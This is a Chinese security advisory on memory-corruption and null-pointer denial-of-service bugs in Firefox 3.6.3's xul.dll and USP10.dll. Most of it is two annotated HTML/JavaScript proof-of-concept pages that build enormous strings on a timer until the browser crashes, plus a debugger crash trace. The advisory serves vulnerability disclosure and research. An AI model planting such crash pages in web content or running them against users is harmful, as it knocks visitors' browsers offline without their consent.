Firefox USP10.dll和xul.dll库多个拒绝服务漏洞

受影响系统:

Mozilla Firefox 3.6.3

描述:
Firefox是非常流行的开源WEB浏览器。

Firefox的xul.dll库中的gfxWindowsFontGroup::MakeTextRun函数和USP10.dll库的DoubleWideCharMappedString类中存在多个拒绝服务漏洞。如果网页中的JavaScript代码创建了包含超长字符串元素的数组，然后将超长字符串附加到P元素的内容中，就会触发内存破坏或空指针引用，导致浏览器崩溃。

<*来源:x90c (http://www.x90c.org)
  
  链接:
http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

[PoC #1 – firefox_3.6.3_dos_poc_1.htm] —

<HTML>
<HEAD>
<!-- PoC #1 from the advisory: everything happens in the script below;
     execution is started by the BODY onload handler further down. -->
<SCRIPT LANGUAGE="javascript">

// Builds a single very large string by repeated concatenation and appends it
// as one text node to the element with id "p1".
// The loop runs 0x700000 / 4 times and appends 4 characters per iteration,
// so Text1 ends up 0x700000 UTF-16 code units long before it is handed to
// the DOM. The advisory attributes the crash to text-run creation for this
// node (gfxWindowsFontGroup::MakeTextRun in xul.dll); the function itself
// only allocates and appends.
// NOTE(review): the quotes around p1 are typographic (‘ ’), which looks like
// a transcription artifact of the advisory rather than the author's source.
function append_text_into_body()
{
    var p1 = document.getElementById(‘p1’);
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont… into p element on body element.
    // Incremental concatenation: each iteration produces a new string value;
    // how much of this is copied versus rope-linked is engine-specific.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can’t make Texts it caused an crash.
}

// Page-level state shared across the timer-driven calls of fill_all_memory():
// arr1..arr5 keep the references that hold each batch of "chunk" strings
// alive; `a` is the stage counter (starts at 1, advanced inside
// fill_all_memory()) that selects which array is filled on a given call.
var arr1, arr2, arr3, arr4, arr5;
var a = 1;

// Declared but never assigned or read on this page.
var timer;

// One step of the memory-pressure routine; called repeatedly by try_fill().
// Each call (1) advances the stage counter `a` once it is past 5 and calls
// append_text_into_body() once `a` reaches 30, (2) rebuilds a large `chunk`
// string, and (3) on stages 1..5 stores 0xd0 references to that string in
// arr1..arr5 respectively and moves to the next stage.
// Stages 1..5 fill one array each; calls 6 onward only increment `a`, so
// the append step starts roughly 24 calls (about 12 s at the 500 ms timer)
// after the last array is filled and then runs on every subsequent call.
function fill_all_memory()
{
    // Two UTF-16 code units (from the %u escapes); doubled below until it
    // exceeds 0x400000 units, i.e. it stops at 0x800000.
    var chunk = unescape("%u4141%u4141");
    var i = 0;

    // Stage bookkeeping happens before the allocation below, so the chunk
    // is rebuilt on every call even when no array is left to fill.
    if( a > 5 )
    {
        a++;
    }
    if(a >= 30)
    {
        append_text_into_body();
    }

    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    // Final size: 3 * 0x800000 = 0x1800000 code units (about 48 MiB if the
    // engine stores it as flat UTF-16).
    chunk = chunk + chunk + chunk;
    // Whole-range substring is a no-op on the value; presumably intended to
    // force the engine to materialise the concatenated string — TODO confirm.
    chunk = chunk.substring(0, chunk.length);

    // Each array slot stores a reference to the same string value; whether
    // the engine keeps one copy or several is not determined by this code.
    if(a == 1)
    {
        arr1 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr1[i] = chunk;
        }
        a = 2;
    }
    else if(a == 2)
    {
        arr2 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr2[i] = chunk;
        }
        a = 3;
    }
    else if(a == 3)
    {
        arr3 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr3[i] = chunk;
        }
        a = 4;
    }
    else if(a == 4)
    {
        arr4 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr4[i] = chunk;
        }
        a = 5;
    }
    else if(a == 5)
    {
        arr5 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr5[i] = chunk;
        }
        a = 6;
    }
}

// Timer loop: runs one fill_all_memory() step, then re-arms itself every
// 500 ms. The timer is never cleared, so the loop only ends when the page
// is closed or the browser process dies.
// Note the string form of setTimeout (evaluated like eval); a function
// reference would be the modern equivalent.
function try_fill()
{
    fill_all_memory();
    setTimeout("try_fill();", 500);
}

</SCRIPT>
</HEAD>

<!-- Entry point: try_fill() is started from onload and keeps re-arming
     itself, so the page runs until memory is exhausted or the browser
     crashes. The P element is the target of append_text_into_body().
     NOTE(review): the id value is wrapped in typographic quotes (’ ′),
     which looks like a transcription artifact of the advisory. -->
<BODY onload="try_fill();">
<P id=’p1′></P>
</BODY>
</HTML>

[PoC #2 – firefox_3.6.3_dos_poc_2.htm] —

<HTML>
<HEAD>
<!-- PoC #2 from the advisory: same append routine as PoC #1, but without
     the staged array filling; see the comments on fill_all_memory(). -->
<SCRIPT LANGUAGE="javascript">

// Identical to the routine in PoC #1: builds a string of 0x700000 UTF-16
// code units by appending "AAAA" 0x700000 / 4 times, wraps it in a text
// node and appends it to the element with id "p1". In this PoC it is
// invoked on every timer tick (see fill_all_memory()), so the text node
// count in p1 grows with each call.
// NOTE(review): the quotes around p1 are typographic (‘ ’), which looks like
// a transcription artifact of the advisory rather than the author's source.
function append_text_into_body()
{
    var p1 = document.getElementById(‘p1’);
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont… into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can’t make Texts it caused an crash.
}

// Leftovers from PoC #1: neither `a` nor `timer` is read or written by any
// function in this variant.
var a = 1;

var timer;

// Variant of the PoC #1 routine with no stage counter and no retained
// arrays: every call first appends another 0x700000-unit text node to p1,
// then builds a 0x1800000-unit string that is dropped when the function
// returns. The author's trailing comment says the null-pointer dereference
// variant does not even need the append call; that claim is the author's,
// not something visible in this code.
function fill_all_memory()    // This function’s variation can makes an null pointer deref without append_text_into_body() calling.
{
    // Two UTF-16 code units (from the %u escapes); note the second unit
    // differs from PoC #1 (%u4242 instead of %u4141).
    var chunk = unescape("%u4141%u4242");
    var i = 0;

    append_text_into_body();

    // Doubles until the length exceeds 0x400000, ending at 0x800000 units.
    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    // Whole-range substring; no effect on the value (see PoC #1).
    chunk = chunk.substring(0, chunk.length);
}

// Timer loop: one fill_all_memory() step, then re-arm after 10 ms; the
// timer is never cleared. The author's comment block below records the
// timer intervals they tried (10 ms through 5000 ms) and that the crash
// location reported by the debugger was the same for each (the ” marks
// are ditto marks for the address shown on the first entry).
function try_fill()
{
    fill_all_memory();
    // this poc makes 99% almost crashed same location as below.
    // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
    //       73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=????
    // 100: ”
    // 150: ”
    // 200: ”
    // 300: ”
    // 500: ”
    // 1000: ”
    // 5000: ”
    setTimeout("try_fill();", 10);
}

</SCRIPT>
</HEAD>

<!-- Entry point: try_fill() is started from onload and re-arms itself every
     10 ms. The P element receives one new text node per tick.
     NOTE(review): the id value is wrapped in typographic quotes (’ ′),
     which looks like a transcription artifact of the advisory. -->
<BODY onload="try_fill();">
<P id=’p1′></P>
</BODY>

</HTML>

建议:

厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/
